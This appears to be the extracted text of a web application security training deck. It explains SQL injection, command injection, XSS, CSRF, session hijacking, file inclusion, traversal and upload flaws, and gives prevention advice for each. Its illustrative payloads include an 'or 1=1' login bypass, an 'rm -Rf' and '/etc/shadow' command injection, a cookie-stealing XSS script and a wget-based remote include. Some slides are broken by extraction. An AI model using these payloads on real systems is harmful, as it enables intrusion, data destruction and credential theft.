  • 23. Get a file on a web server External attack vectors − RFI − SQL injection − File upload − Exposed admin interface Low “barrier to entry” − Lots of publicly available malware − Lots of web app vulnerabilities − Trivial to use Webshell ?
  • 29. Injection • Tricking an application into including unintended commands in the data sent to an interpreter Injection • Take strings and interpret them as commands • SQL, OS Shell, LDAP, XPath, etc… Interpreter • Technical:Injection can result in data loss or corruption, lack of accountability, or denial of access. • Business: All data could be stolen, modified, or deleted. Could your reputation be harmed? Impact
  • 30. SQL Injection  technique that allows attackers to inject SQL queries directly on the database that is behind a Web server, by manipulating the input "INPUT" to an application. Example : a login page "login.asp", the user is prompted to enter a user name "User1" and password "pass2015", this operation results in the form of a SQL query: SELECT * FROM Users WHERE user='User1' and password= 'pass2015'
  • 31. SQL Injection This request must return to the application one or more fields from the database. Suppose the user enter the value of the user name value 'or 1 = 1-- "the request will be in the form SELECT * FROM Users WHERE user=' or 1=1-- and password =''
  • 32. SQL Injection In the case of SQL Server, "--" is used to post a comment to the end of the line, the request would be SELECT * FROM Users WHERE user= “ or 1=1 The query will return all the fields in the user table and the attacker would be authenticated. The attacker was successful as to authenticate without using a user name or password.
  • 33. DB User: Pass: ‘ or 1=1 # connection.php Admin.php Etc… Example SQL Injection
  • 35. SQL INJECTION – Prevention Recommandations 1. Use an interface that supports bind variables (e.g., prepared statements, or stored procedures), 2. Bind variables allow the interpreter to distinguish between code and data 3. Encode all user input before passing it to the interpreter 4. Always perform ‘white list’ input validation on all user supplied input 5. Always minimize database privileges to reduce the impact of a flaw -For more details, read the :
  • 36. Command Injection/Injection OS Command injection attack consists : - To inject and execute some commands by the attacker in the vulnerable application. - However, the commands are executed on the target server and the attacker has a partial or full access to the hosting server. - The attacker can add their own code to the existing code to extend the application of the default functionality without the need to run system commands.
  • 37. 44 <?php echo system("ls -1 *.".$_GET['ext']); listing.php ?> /listing.php?ext=php;cd/;rm+-Rf+* 1 cnx.php index.php connectBase.php listing.php 2 ls -1 *. php;cd/;rm+-Rf+* 3 4 / 5 Command Injection/Injection OS
  • 38. Example Language: Java ... String ping= request.getParameter ("cmd"); java.lang.Runtime.getRuntime().exec(ping); ... An attacker execute arbitrary commands with hight privileges by injecting through the application for example in the input ping arbitrary code eg " | cat / etc / shadow" to display all the passwords of system users crypted in MD5. Command Injection/Injection OS
  • 39. Solution:  Avoid using functions that could call shell commands.  When you use functions which could call shell commands, check all input parameters that do not contain system commands. Command Injection/Injection OS
  • 41.  This technique is to inject Javascript, VB, ActiveX, through web browser the aim to access to informations, cookies, configuration ...  The XSS attack primarily affects the user, and in some cases can even execute commands on the machine.  No effective protection client-side just you must disable the execution of java scripts, ActiveX making navigation difficult. Cross site scripting(XSS)
  • 42.  These data are can be:  Stored in database  Reflected from web input (form field, hidden field, URL, etc…)  Sent directly into rich JavaScript clientVirtuellement toute application Web est vulnérable  Try this in your browser  javascript:alert(‘’XSS’’);  javascript:alert(document.cookie);  Impact:  Steal user’s session, steal sensitive data, rewrite web page, redirect user to phishing or malware site  Most Severe: Install XSS proxy which allows attacker to observe and direct all user’s behavior on vulnerable site and force user to other sites Cross site scripting(XSS)
  • 43. Muscat No pages were found: Muscat Search engine classic scenario Cross site scripting(XSS) Go..
  • 44. Moteur de recherche <script>alert(“Test")</script>"> Scénario classique Cross site scripting(XSS) Go..
  • 47. 29 1.Example XSS  Attack stored on the web server XSS sent by the hacker Smith <script src=> </script> XSS XSS Web Application SGBD nom tarek<script src=></script> mail Cross site scripting(XSS)
  • 48. 30 1.Example XSS  Attack stored on the web server  XSS sent by the hacker  access to a resource causes the execution XSS admin. 1 GET liste_inscrits.php XSS Web Application Smith <script src= /bad.js </script> XSS SGBD 2 Smith <script src=></</script> Cross site scripting(XSS)
  • 49. 31 1.Example XSS admin. 1 GET listeinscrits.php XSS 3 Web Application Smith <script src=> </script> XSS SGBD 2 Smith <script src=></script> GET Cross site scripting(XSS)  Attack stored on the web server  XSS sent by the hacker  access to a resource causes the execution XSS
  • 50. 32 1.Example XSS admin. 1 GET liste_inscrits.php XSS 3 GET Web Application Smith <script src=> </script> XSS SGBD 2 document.write(‘<img src=’+document.cookie+’ width=1>’) 4 c.js Cross site scripting(XSS)  Attack stored on the web server  XSS sent by the hacker  access to a resource causes the execution XSS
  • 51. 33 1.Example XSS admin. 1 GET listeinscrits.php XSS 3 Web Application Smith <script src=> </script> XSS SGBD 2 5 GET document.write('<img src='+document.cookie+' width=1>') GET 4 bad.js Cross site scripting(XSS)  Attack stored on the web server  XSS sent by the hacker  access to a resource causes the execution XSS
  • 52. 34 1.Example XSS admin. 1 GET liste_inscrits.php XSS 3 Web Application Smith <script src=> </script> XSS SGBD 2 5 GET vol de session idsess=akkmm98g56x 6 document.write('<img src='+document.cookie+' width=1>') 4 GET c.js Cross site scripting(XSS)  Attack stored on the web server  XSS sent by the hacker  access to a resource causes the execution XSS
  • 53. 35 2. Example XSS  Reflected Attack  Pirate establish a XSS (email, web page link) 1 XSS 2 XSS 1 Cross site scripting(XSS)
  • 54. 36 2.Exemple XSS  Internet user: XSS sends to the server (click on a link in email / page, automatic download of a resource?) 1 2 XSS 3 XSS 1 XSS 2 XSS 3 Cross site scripting(XSS)  Reflected Attack  Pirate establish a XSS (email, web page link)
  • 55. 37 2. Example XSS  Reflected Attack  Pirate establish a XSS (email, web page link)  Internet user: XSS sends to the server (click on a link in email / page, automatic download of a resource?)  Web server: Receive and return the XSS 1 2 XSS 3 XSS 4 1 XSS XSS 2 XSS 3 4 XSS Cross site scripting(XSS)
  • 56. 38 2. Example XSS  Web browser : execute XSS 1 2 XSS 3 XSS 4 1 XSS XSS 2 XSS 3 4 XSS Cross site scripting(XSS)  Reflected Attack  Pirate establish a XSS (email, web page link)  Internet user: XSS sends to the server (click on a link in email / page, automatic download of a resource?)  Web server: Receive and return the XSS
  • 57. (AntiSamy) XSS– Prevention Recommendations • Eliminate Flaw • Don’t include user supplied input in the output page • Defend Against the Flaw • Use Content Security Policy (CSP) • Primary Recommendation: Output encode all user supplied input (Use OWASP’s ESAPI or Java Encoders to output encode) • Perform ‘white list’ input validation on all user input to be included in page • For large chunks of user supplied HTML, use OWASP’s AntiSamy to sanitize this HTML to make it safe See: References • For how to output encode properly, read the Site Scripting) Prevention Cheat Sheet
  • 58. Solution:  The XSS can be prevented during the application development phase. It should validate all INPUT and OUTPUT of the application; remove all the special characters will be used in a script.  The XSS can be avoided if the application replaces special characters with those listed below before posting them on the browser: < &lt; > &gt; ( &#40; ) &#41; # &#35; & &#38;  There are already available functions according to the language used  HtmlEncode() – ASP  Htmlentities() – PHP  Taglibs ou la classe javax.swing.text.html – J2EE  escapeHTML() – Perl  For how to output encode properly, read the Site Scripting) Prevention Cheat Sheet XSS– Prevention
  • 59. Cross Site Request Forgery (CSRF) • An attack where the victim’s browser is tricked into issuing a command to a vulnerable web application • •Vulnerability is caused by browsers automatically including user authentication data (session ID, IP address, Windows domain credentials, …) with each request • What if a hacker could steer your mouse and get you to click on links in your online banking application? • What could they make you do? Imagine… • Initiate transactions (transfer funds, logout user, close account) • Access sensitive data • Change account details Impact
  • 60. 53 Add comment … <img src='article.php?id=3&action=del' width='0'> … 1 Malicious user <img src='article.php?id=3&action=del' width='0'> SGBD
  • 61. 54 Add comment … <img src='article.php?id=3&action=del' width='0'> … 1 malicious user 2 GET article.php?id=3&action=read illegitimate user <img src='article.php?id=3&action=del' width='0'> SGBD
  • 62. 55 Ajouter un commentaire … <img src='article.php?id=3&action=del' width='0'> … 1 malicious user 3 2 GET article.php?id=3&action=read illegitimate user <img src='article.php?id=3&action=del' width='0'> <img src='article.php?id=3&action=del' width='0'> SGBD
  • 64. 56 Add comment … <img src='article.php?id=3&action=del' width='0'> … 1 membre d’un site protégé 3 2 GET article.php?id=3&action=read membre d’un <img src='article.php?id=3&action=del' width='0'> site protégé GET http://.../article.php?id=3&action=del 4 <img src='article.php?id=3&action=del' width='0'> SGBD
  • 65. • Add a secret, not automatically submitted, token to ALL sensitive requests –This makes it impossible for the attacker to spoof the request •(unless there’s an XSS hole in your application) –Tokens should be cryptographically strong or random •Options –Store a single token in the session and add it to all forms and links •Hidden Field: <input name="token" value="687965fdfaew87agrde" type="hidden"/> •Single use URL: /accounts/687965fdfaew87agrde •Form Token: /accounts?auth=687965fdfaew87agrde … –Beware exposing the token in a referer header •Hidden fields are recommended –Can have a unique token for each function •Use a hash of function name, session id, and a secret –Can require secondary authentication for sensitive functions (e.g., eTrade) •Don’t allow attackers to store attacks on your site –Properly encode all input on the way out –This renders all links/requests inert in most interpreters See the: for more details CSRF– Prevention
  • 66. Broken Authentication and Session Management • Means credentials have to go with every request • Should use SSL for everything requiring authentication HTTP is a “stateless” protocol • SESSION ID used to track state since HTTP doesn’t • and it is just as good as credentials to an attacker • SESSION ID is typically exposed on the network, in browser, in logs, … Session management flaws • Change my password, remember my password, forgot my password, secret question, logout, email address, etc… Beware the side-doors • User accounts compromised or user sessions hijacked Impact
  • 67. Broken Authentication Illustrated Custom Code Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus.Functions 1 User sends credentials 2 (Site uses URL rewriting (i.e., put session in URL) 3 User clicks on a link to in a forum 4 Hacker checks referrer logs on and finds user’s JSESSIONID 5 Hacker uses JSESSIONID and takes over victim’s account
  • 68. Avoiding Broken Authentication and Session Management  Verify your architecture  Authentication should be simple, centralized, and standardized  Use the standard session id provided by your container  Be sure SSL protects both credentials and session id at all times  Verify the implementation  Forget automated analysis approaches  Check your SSL certificate  Examine all the authentication-related functions  Verify that logoff actually destroys the session  Follow the guidance from
  • 69. 58  Session based on a unique identifier 1 3 login=zorro&passwd=paszorro sessid=21000 sessid=21000 Hi Zorro 2 article=12&action=del Session hijacking
  • 70. 59  Session based on a unique identifier  Diverting a session id = provide a valid 1 3 login=zorro&passwd=paszorro sessid=21000 sessid=21000 sessid=21000 Hi Zorro 2 article=12&action=display article=5&action=del Session hijacking
  • 71. 60  Identifier transmitted by:  Cookie  URL (query string)  Hidden form imput Session hijacking  Session based on a unique identifier  Diverting a session id = provide a valid
  • 72. 61  Identifier transmitted by cookie, URL, form field.  Attacker get a valid identifier  Prediction id = integer incremented Session hijacking  Session based on a unique identifier  Diverting a session id = provide a valid
  • 73.  Theft o id in the URL (history, bookmark, logs, email sending, .. o cookie theft (XSS, public computer) o interception (Network Sniffer) Session hijacking  Identifier transmitted by cookie, URL, form field.  Attacker get a valid identifier  Prediction id = integer incremented  Session based on a unique identifier  Diverting a session id = provide a valid
  • 75. Brute Force: Brute force attacks work by calculating every possible combination that could make up a password and testing it to see if it is the correct password. This means short passwords can usually be discovered quite quickly, but longer passwords may take decades. Exemple: Username = Jon Passwords = smith, michael-jordan, [pet names], [birthdays], [car names], …. Usernames = Jon, Dan, Ed, Sara, Barbara, ….. Password = 12345678 2 types: Normal: reversed: Login Password Login Password N1 N 1 Brute force
  • 76. Insufficient Authentication Insufficient Authentication occurs when a web site permits an attacker to access sensitive content or functionality without having to properly authenticate. Web-based administration tools are a good example of web sites providing access to sensitive functionality. Depending on the specific online resource, these web applications should not be directly accessible without requiring the user to properly verify their identity.This approach to security is called "Security Through Obscurity". Exemple: Many web applications have been designed with administrative functionality located directly off of the root directory (/admin/). This directory is usually never linked from anywhere on the web site, but can still be accessed using a standard web browser. The user or developer never expected anyone to view this page because it is not linked, so enforcing authentication is many times overlooked. If attackers were to simply visit this page, they would obtain complete administrative access to the web site. Insufficient Authentication
  • 77. Insufficient Authorization: When a user is authenticated to a web site, it does not necessarily mean that the user should have full access to all content and functionality. Exemple: Same example as /admin/ but after authenticate. Insufficient Authorization
  • 78.  Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.  The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.  Production:  Exploiting bugs  Maintain access  Impact:  Access to system resources.  ID Theft.  Setting up a backdoor Privilege escalation
  • 79. Privilege escalation occurs in two forms:  Vertical escalation: Obtain more privileges (Administrator Role). • User A has access to his bank account in a internet baking . • The vulnerability occurs when the user A accesses to the internet banking administrator account by doing same malicious activity.  Horizontal escalation: Carry out actions or access resources on other user accounts have the same privilege. • User A has access to their own bank account in an Internet Banking application. • User B has access to their own bank account in the same Internet Banking application. • The vulnerability occurs when User A is able to access User B's bank account by performing some sort of malicious activity. Privilege escalation
  • 80. Insecure Direct Object References • This is part of enforcing proper “Authorization”, along with Failure to Restrict URL Access How do you protect access to your data? • Only listing the ‘authorized’ objects for the current user, or • Hiding the object references in hidden fields • … and then not enforcing these restrictions on the server side • This is called presentation layer access control, and doesn’t work • Attacker simply tampers with parameter value A common mistake … • Users are able to access unauthorized files or data Impact
  • 81.  The attacker notices the parameter acct = 6065 ?acct=6065  the hacker modifies the following manner ?acct=6066  The hacker shows another account 6065 Insecure Direct Object References
  • 82.  The attacker notices the URL (the role is displayed) /user/getAccounts  The attacker alter the URL (role) /admin/getAccounts, or /manager/getAccounts  The hacker have more privilege Insecure Direct Object References
  • 84. Directory indexing: Listing / indexing Automatic of a directory is a web server function that lists all the files in a requested directory if the base file (index.html / home.html / default.htm) is not present. critical information can be obtained. Example: Présence de fichiers .bak .old et même des .conf .config Directory indexing
  • 85.  The include file technique can execute dynamic code hosted on a remote server on the target server,  Using an include () function is the same to make a simple copy-paste: the code of the called file is inserted into the calling page, in the exact place where the function is located.  This attack was born following the wrong call parameters by the function include (). Remote File Include
  • 87. 46 Injection du caractère null 0 test.php?p= 1 test.php <?php require($_GET['p'].".php"); ?>
  • 89. 48 <?php echo system('cd /tmp; ls; wget; ls'); GET bad.txt 2 test.php?p= 1 bad.txt 3 ?> <?php require($_GET['p'].".php"); ?> test.php <?php echo system('cd /tmp; ls; wget; ls'); ?>
  • 90. 49 <?php echo system('cd /tmp; ls; wget; ls'); GET bad.txt 2 test.php?p= 1 bad.txt 3 4 ?> cd /tmp; ls <?php require($_GET['p'].".php"); ?> test.php <?php echo system('cd /tmp; ls; /tmp wget; ls'); ?>
  • 91. 50 <?php echo system('cd /tmp; ls; wget; ls'); GET bad.txt 2 bad.txt 3 exec ?> 5 test.php?p= 1 4 wget <?php require($_GET['p'].".php"); ?> test.php <?php /tmp echo system('cd /tmp; ls; wget; ls'); ?>
  • 92. Example : <?php # def des constantes $file = "toto.php"; #pour avoir un register global if (isset($HTTP_GET_VARS)) { while(list($var,$val)=each($HTTP_GET_VARS)) { $$var=$val;}} #include de la lib toto.php include ($file); ?> A call type: GET /index.php?file= ‘code_hostile.txt’ will result to execute arbitrary PHP code on the server. Remote File Include
  • 93. file Insert: <?php if(isset($_GET['page'])) {include $_GET['page'].'.php';} else {include 'accueil.php';} ?> Remote File include: •Remote inclusion of file. •The remote execution of source files (PHP, JSP, ASP, ...) on your web server WEBSHELL install on your server: Total Control, system commands Remote Execution .. Remote File Include
  • 95. A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. ../../../../../etc/passwd Directory traversal
  • 96. Remote File Upload: • Generally the site have a page to upload images, CVs, articles, etc ... •Absence or insufficiency of control over the types of files to upload. •The hacker trying to upload files (PHP, JSP, ASP, etc ..) to have control on the remote web server.  La Remote File upload is a door that allows an attacker to access the web server: -totale access. -Access to OS. -theft criticals informations(Passwords,customer portfolios, etc..) Remote file upload
  • 97. File manupilation– Prevention  Recommandations  Block the path of the files located below the website directory(chroot mechanism);  Disable the display of files in a directory not containing index file ( "Directory Browsing");  Delete unnecessary files and directories (including hidden files);  Make sure the server protects access to directories containing sensitive data;
  • 99. Denie de service Denial of Service The Denial of Service (DoS) attack is focused on making a resource (site, application, server) unavailable for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. Example: Using SQL injection to erase the contents of the database of a website.
  • 100. Abuse of functionality Abuse of functionality: Abuse of functionality, sometimes referred to as a "business logic attack", depends on the design and implementation for application functions and features. As functionality is added to applications, thought must be given to how the function or feature can be manipulated to circumvent the business process, or abused to perform a function not intended by the developer. Example: -Using a send-mail form to generate spam http://example/cgi- bin/ &message=vous%20avez%20été%20spammé
  • 101. Insufficient Anti-automation: • Insufficient Anti-automation occurs when a web application permits an attacker to automate a process that was originally designed to be performed only in a manual fashion, i.e. by a human web user. • Web application functionality that is often a target for automation attacks may include: • Application login forms – attackers may automate brute force login requests in an attempt to guess user credentials • Service registration forms – attackers may automatically create thousands of new accounts • Email forms – attackers may exploit email forms as spam relays or for flooding a certain user’s mailbox • Account maintenance – attackers may perform mass DoS against an application, by flooding it with numerous requests to disable or delete user accounts • Forms tied to SQL database queries - these may be exploited in order to perform a denial of service attack against the application. The attack is performed by sending numerous heavy SQL queries in a short period of time, hence denying real users from service. • Web-based SMS message sending - attackers may exploit SMS message sending systems in order to spam mobile phone users Insufficient Anti-automation:
  • 102. Example: -An application that allows users to view their account details, by directly accessing a URL similar to the following: -Where XYZ denotes an Account ID number. -If the application issues predictable (or enumerable) Account ID numbers, and also does not employ anti-automation mechanisms, an attacker could write an automated script, which would submit massive amounts of HTTP requests, each with a different Account ID number, and then harvest user account information from the response page. -In this example, the application suffered from several vulnerabilities, all of which contributed to the success of the attack : -Insufficient Anti-automation: web users were allowed to submit a large amount of service requests, without any mechanism to limit them. For example, After 3 invalid attempts, the IP address should have been blocked for a "chilling period", or should require that the user will contact the service provider over the phone -Insufficient Authentication: unauthenticated web users were allowed to access sensitive application functionality Insufficient Anti-automation:
  • 103. Example: -An application that allows users to view their account details, by directly accessing a URL similar to the following: -Where XYZ denotes an Account ID number. -If the application issues predictable (or enumerable) Account ID numbers, and also does not employ anti-automation mechanisms, an attacker could write an automated script, which would submit massive amounts of HTTP requests, each with a different Account ID number, and then harvest user account information from the response page. -In this example, the application suffered from several vulnerabilities, all of which contributed to the success of the attack : -Insufficient Anti-automation: web users were allowed to submit a large amount of service requests, without any mechanism to limit them. For example, After 3 invalid attempts, the IP address should have been blocked for a "chilling period", or should require that the user will contact the service provider over the phone -Insufficient Authentication: unauthenticated web users were allowed to access sensitive application functionality Insufficient Anti-automation:
  • 104. -CAPTCHA:A common practice for protecting against automation attacks is the implementation of CAPTCHA mechanisms in web applications. CAPTCHA stands for "Completely Automated Public Turing test to Tell Computers and Humans Apart“. -Provide configurable per-user/session request rate limits, For example, an administrator should be allowed to combine "10 requests per minute" with "500 requests per day" in order to simultaneously apply policies which prevent users from automatic crawling/screen scraping as well as longer-term slow leeching activities. Abuse of functionality/Insufficient Anti-automation Prevention
  • 106. Security Misconfiguration • We think to networks, systems and platforms • We must not forget the development environments Web applications rely on a secure foundation • Think of all the places your source code goes • Security should not require secret source code • All credentials should change in production Is your source code a secret? • Install backdoor through missing OS or server patch • Unauthorized access to default accounts, application functionality or data, or unused but accessible functionality due to poor server configuration Impact
  • 107. Hardened OS Web Server App Server Framework Security Misconfiguration Illustrated App Configuration Custom Code Accounts Finance Administration Transactions Communication KnowledgeMgmt E-Commerce Bus.Functions Test Servers QA Servers Source Control Development Database Insider
  • 108. Avoiding Security Misconfiguration • Verify your system’s configuration management  Secure configuration “hardening” guideline • Automation is REALLY USEFUL here  Must cover entire platform and application  Analyze security effects of changes • Can you “dump” the application configuration  Build reporting into your process  If you can’t verify it, it isn’t secure • Verify the implementation  Scanning finds generic configuration and missing patch problems
  • 110. It is the act of tricking someone into giving confidential information (like passwords and credit card information) on a fake web page or email form pretending to come from a legitimate company (like their bank). For example: Sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. Phishing
  • 114.  SQL injection vulnerabilities are commuted at source code during application programming:  software developers create dynamic database queries that include the input provided by the user. To avoid SQL injection attacks is simple. Developers should be: a) stopped writing dynamic queries, and / or, b) prevent the entry provided by the user that contains SQL verbs How to prevent SQL Injection
  • 115. Primary Defenses: Option #1: Use of Prepared Statements (Parameterized Queries) Option #2: Use of Stored Procedures Option #3: Escaping all User Supplied Input Additional Defenses: Also Enforce: Least Privilege Also Perform: White List Input Validation How to prevent SQL Injection
  • 116. Option #1: Use of Prepared Statements (Parameterized Queries) Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. Java EE – use PreparedStatement() with bind variables .NET – use parameterized queries like SqlCommand() or OleDbCommand() with bind variables PHP – use PDO with strongly typed parameterized queries (using bindParam()) How to prevent SQL Injection
  • 117. How to prevent SQL Injection Example #1: Prepared Statements
  • 118. How to prevent SQL Injection Example #2: Prepared Statements
  • 119. How to prevent SQL Injection Example #3: Prepared Statements
  • 120. How to prevent SQL Injection
  • 122. C# .NET Prepared Statement Example String query = "SELECT account_balance FROM user_data WHERE user_name = ?"; try { OleDbCommand command = new OleDbCommand(query, connection); command.Parameters.Add(new OleDbParameter("customerName", CustomerName Name.Text)); OleDbDataReader reader = command.ExecuteReader(); // … } catch (OleDbException se) { // error handling } How to prevent SQL Injection
  • 123. Option 2: Stored Procedures  The difference between prepared statements and stored procedures is that the SQL code for a stored procedure is defined and stored in the database itself, and then called from the application.  Both of these techniques have the same effectiveness in preventing SQL injection so your organization should choose which approach makes the most sense for you. How to prevent SQL Injection
  • 124. Example PHP-Stored Procedures Developers may also specify parameters that hold values both input and output; the syntax is similar to output parameters. In this next example, the string 'hello' is passed into the stored procedure, and when it returns, hello is replaced with the return value of the procedure. How to prevent SQL Injection
  • 126.  Option #3: Escaping all User Supplied Input : PHP: addslashes() : The addslashes() function returns a string with backslashes in front of predefined characters. The predefined characters are:single quote ('),double quote ("),backslash (),NULL mysql_real_escape_string: Escapes special characters in a string for use in an SQL statement ereg : The ereg function apply a regular expression on a chain for example to validate an identity card number : ereg("^[0-9]{8}$", @$num). (prevent SQL injection and XSS) Validations des types des inputs: The following functions allows us to verify the types of inputs after their manipulation: is_ array ,is_ binary ,is_ bool ,is_ buffer ,is_ callable ,is_ double ,is_ float ,is_ int , is_ integer ,is_ long ,is_ null ,is_ numeric ,is_ object ,is_ real ,is_ resource ,is_ scalar , is_ string , is_ unicode. How to prevent SQL Injection
  • 127. How to prevent SQL Injection  Solution: la validateur du Struts. Use the Struts libraries that allows us to validate all data types (org.apache.commons.validator.routines) and which contains for example:  Date and Time Validators,  Numeric Validators ,  Regular Expression validation  General Code Validation  ISBN Validation  IP Address Validation  Email Address Validation  URL Validation  Domain Name Validation  This library allows us to avoid all types ofsql injection ,XSS, injection du code,file include etc.. *For more information: link: summary.html#package_description
  • 128. PHP: • htmlentities() , htmlspecialchars(): htmlentities($ch), htmlspecialchars($ch) converts all special characters to their HTML entity. Example : – "&" becomes"&amp;" – """ becomes"&quot; " or "&#039;" – "<" becomes "&lt;" – ">" becomes "&gt;" Java: Struts validator. Dot.Net: • HTMLEncode : server.HTMLEncode converts all special characters to their HTML entity. Example: server.HTMLEncode("<") becomes &lt; • IsNumeric :test if an entry is digital and this helps us to avoid SQL injection in the type numeric field. Microsoft Anti-Cross Site Scripting Library: AntiXSSLibrary.HtmlEncode et AntiXSSLibrary. UrlEncode  let the following characters: (. a-z A-Z 0-9, - _ '') anf all other characters will be encoded. Prevent XSS
  • 129. PHP:file_exists: Returns true if the filename exists and FALSE if not. (prevent the file include). Prevent File manupilation Insertion de fichier(File include vulnerability ): <?php if(isset($_GET['page'])) {include $_GET['page'].'.php';} else {include 'accueil.php';} ?> <?php if(isset($_GET['page']) AND file_exists($_GET['page'].'.php')) {include $_GET['page'].'.php';} else { include 'accueil.php'; } ?> Java: boolean exists = (new File("filename")).exists(); if (exists) { // File or directory exists } else { // File or directory does not exist } if ( File.Exists(file name) ) { // File or directory exists }
  • 132. Side "application" 1) Securing the hosting platform:  Update and server hardening.  Network intrusion detection.  Host intrusion detection (HIDS).  Anti-Virus detection  application filtering
  • 133. Side "application" 2) Monitoring and reviews the platform access logs :  Administrators logs  Public Access logs,
  • 134. Side "application" 3. Backup of sensitive data :  Source code,  Databases,
  • 135. Side "application" 4) Application validation:  After insert or add new services ... by a third entity.  Pentest the application before it online :  At this phase all the documentation relating to the application must be requested (Design, Structure, Architecture)
  • 136. Side "application" 5) Regular Security audit :  Application,  Web sever,
  • 137. Side "application" 6) Implement a business continuity plan:  virtualization.  Others solutions.
  • 139. Side «Webmaster» 1) Securing the webmaster station's website::  Install and update an antivirus solution  Update applications and operating system (security patch)  Install up a personal firewall
  • 140. Side «Webmaster» 2) Webmaster station physical security :  Using an anti-theft device  System Lock in case of non-use  Data encryption
  • 141. Side «Webmaster» 3) Passwords management :  periodically changing passwords  secure storage of passwords if necessary  Protecting passwords against disclosure
  • 142. Side «Webmaster» 4) Access control:  Restrict access to administration (by IP address, e-certificate)  Using the secure administration methods (SSH, SCP, ...)
  • 143. Side «Webmaster» 5) Defline Security Advisory Alerts and Warnings:  To be updated of new vulnerabilities.  Apply security patches in optimal time.  To guarantee its flow the OCERT website.
  • 146. Hardening web hosting platform  CIS Security Secure Configuration Benchmarks  NIST hardening standards  editor official website  Windows  Linux  Oracle  Apache  MySQL  Etc. …..